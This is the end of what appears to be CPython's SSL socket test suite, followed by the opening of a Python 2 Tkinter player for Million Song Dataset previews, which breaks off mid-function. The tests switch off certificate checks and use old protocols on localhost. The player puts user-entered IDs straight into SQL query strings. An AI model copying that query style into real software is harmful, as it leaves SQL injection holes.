sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = ssl.wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if alg1 not in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
tests.append(NetworkedBIOTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
player_7digital.py
|
"""
Thierry Bertin-Mahieux (2010) Columbia University
tb2332@columbia.edu
This code uses 7digital API and info contained in HDF5 song
file to get a preview URL and play it.
It can be used to quickly listen to a song in the dataset.
The goal is to be able to search songs by artist name, title,
or Echo Nest ID.
This is part of the Million Song Dataset project from
LabROSA (Columbia University) and The Echo Nest.
Copyright 2010, Thierry Bertin-Mahieux
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import time
import glob
import urllib
import urllib2
import sqlite3
import numpy as np
import threading
import get_preview_url as GETURL
try:
from Tkinter import *
except ImportError:
print 'you need Tkinter installed!'
sys.exit(0)
try:
import ao
except ImportError:
print 'you need pyao installed!'
sys.exit(0)
try:
import mad
except ImportError:
print 'you need pymad installed!'
sys.exit(0)
# sampling rate from 7 digital
DIGITAL7SRATE=22500
def encode_string(s):
"""
Simple utility function to make sure a string is properly
escaped for use in a SQLite query
(different from PostgreSQL: no N prefix to mark unicode)
EXAMPLE:
That's my boy! -> 'That''s my boy!'
"""
return "'"+s.replace("'","''")+"'"
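# Illustrative sketch (added commentary, not part of the original code): encode_string
# doubles single quotes so the value can be embedded directly in a SQLite query string, e.g.
#   encode_string("That's my boy!")  ->  "'That''s my boy!'"
#   q = "SELECT track_id FROM songs WHERE title=" + encode_string("That's my boy!")
# builds: SELECT track_id FROM songs WHERE title='That''s my boy!'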
class PlayerApp(Frame):
"""
MAIN CLASS, contains the Tkinter app
"""
def __init__(self, master=None, tmdb=None, url=''):
"""
Constructor
INPUTS
tmdb - path to track_metadata.db (containing track_7digitalid)
url - more for debugging, starts with a loaded url
"""
Frame.__init__(self, master)
# verbose
self.verbose=1
# some class variables
self.curr_track_id = None
self.is_playing = False
# db conn
self.tmdb = tmdb
self.conn_tmdb = sqlite3.connect(tmdb) if tmdb else None
# grid and size
self.grid(sticky=N+S+E+W)
self.config(height=300,width=500)
self.columnconfigure(0,minsize=60)
self.grid_propagate(0)
# add objects
self.createButtons()
self.createSearchFields()
self.createListBoxes()
# read url
self.url = url
def __del__(self):
""" DESTRUCTOR """
if not self.conn_tmdb is None:
self.conn_tmdb.close()
def createButtons(self):
# quit
self.quitButton = Button(self, text='Quit', command=self.do_quit)
self.quitButton.grid(row=0,column=0,sticky=N+S+E+W)
# search EN ID
self.searchidButton = Button(self, text='Search by EN id', command=self.search_enid)
self.searchidButton.grid(row=4,column=1,sticky=N+S+E+W)
# search artist name
self.searchTitleButton = Button(self, text='Search by Artist/Title', command=self.search_title)
self.searchTitleButton.grid(row=5,column=3,sticky=N+S+E+W)
# play
self.playButton = Button(self,text='play', command=self.play_thread)
self.playButton.grid(row=7,column=1,sticky=N+S+E+W)
# stop
self.stopButton = Button(self,text='stop', command=self.stop)
self.stopButton.grid(row=7,column=2,sticky=N+S+E+W)
def createSearchFields(self):
# search Echo Nest ID
self.entryENID = Entry(self)
self.entryENID.grid(row=3,column=1,sticky=N+S+E+W)
# search artist + title
self.entryArtist = Entry(self)
self.entryArtist.grid(row=3,column=3,sticky=N+S+E+W)
self.entryTitle = Entry(self)
self.entryTitle.grid(row=4,column=3,sticky=N+S+E+W)
def createListBoxes(self):
# vertical scrollbar
self.yScroll = Scrollbar(self,orient=VERTICAL)
self.yScroll.grid(row=6,column=5,sticky=N+S)
# listbox
self.listboxResult = Listbox(self,yscrollcommand=self.yScroll.set)
self.listboxResult.grid(row=6,column=1,columnspan=4,
sticky=N+S+E+W)
self.listboxResult.configure(exportselection=0) # keep the selection from being exported (copy/paste) to other widgets
self.listboxResult.configure(selectmode=SINGLE) # one line at a time
#************************* COMMANDS FOR BUTTONS *******************#
def update_display(self):
""" update the main display (ListBox) from a given track_id """
if self.curr_track_id is None:
print "no current track id"
return
conn = sqlite3.connect(self.tmdb)
q = "SELECT artist_name,title FROM songs WHERE track_id='"+self.curr_track_id+"' LIMIT 1"
res = conn.execute(q)
data = res.fetchone()
conn.close()
self.listboxResult.insert(0,'**************************')
self.listboxResult.insert(1,data[0])
self.listboxResult.insert(2,data[1])
self.listboxResult.insert(3,self.curr_track_id)
if self.url:
self.listboxResult.insert(4,self.url)
def search_title(self):
""" search using artist name and title """
aname = self.entryArtist.get().strip()
title = self.entryTitle.get().strip()
if aname == '' or title == '':
print 'Empty artist or title field:',aname,'/',title
return
# search
q = "SELECT track_7digitalid,track_id FROM songs WHERE artist_name="+encode_string(aname)
q += " AND title="+encode_string(title)+" LIMIT 1"
res = self.conn_tmdb.execute(q)
d7id = res.fetchone()
if d7id is None or d7id[0] == 0: # fetchone() returns None when there is no match
print 'Sorry, we do not have the 7digital track ID for this one'
return
self.get_url_thread(d7id[0]) # get_url() running in the thread sets self.url
self.curr_track_id = d7id[1]
def search_enid(self):
""" search for a song by its trackid or songid """
tid = self.entryENID.get().strip().upper()
if len(tid) != 18:
print 'WRONG ECHO NEST ID:',tid,'(length='+str(len(tid))+')'
return
if tid[:2] != 'TR' and tid[:2] != 'SO':
print 'WRONG ECHO NEST ID:',tid,'(should start by TR or SO)'
return
# we got an id, let's go
if tid[:2] == 'TR':
q = "SELECT track_7digitalid,track_id FROM songs WHERE track_id='"+tid+"' LIMIT 1"
res = self.conn_tmdb.execute(q)
d7id = res.fetchone()
else:
q = "SELECT track_7digitalid,track_id FROM songs WHERE song_id='"+tid+"' LIMIT 1"
res = self.conn_tmdb.execute(q)
d7id = res.fetchone()
print 'for',tid,'we found 7digital track id:',d7id
if d7id is None or d7id[0] == 0: # fetchone() returns None when there is no match
print 'Sorry, we do not have the 7digital track ID for this one'
return
self.get_url_thread(d7id[0]) # get_url() running in the thread sets self.url
self.curr_track_id = d7id[1]
def get_url_thread(self,d7id):
""" launch 'get_url' as a thread, button does not stay pressed """
t = threading.Thread(target=self.get_url,args=(d7id,))
t.start()
def get_url(self,d7id):
""" get an url from a 7digital track id """
url = GETURL.get_preview_from_trackid(d7id)
print 'Found url:',url
self.url = url
self.update_display() # update main display
def do_quit(self):
""" quit but close stream before """
self.stop()
self.quit()
def stop(self):
self.do_stop = True
def play_thread(self):
""" launch 'play' as a thread, button does not stay pressed """
t = threading.Thread(target=self.play)
t.start()
def play(self):
"""
Main function that plays a 7digital url
"""
if self.url == '':
return
if self.is_playing:
return
self.is_playing = True
self.do_stop = False
self.printinfo('start playing url:',self.url)
#urldata = urllib.urlretrieve(self.url)
urlstream = urllib2.urlopen(self.url)
mf = mad.MadFile(urlstream)
# if bits=32, too fast
self.dev = ao.AudioDevice('alsa', bits=16, rate=mf.samplerate(),channels=2)
buf = mf.read()
t1 = time.time()
while buf is not None and not self.do_stop:
# len(buf) is 4608
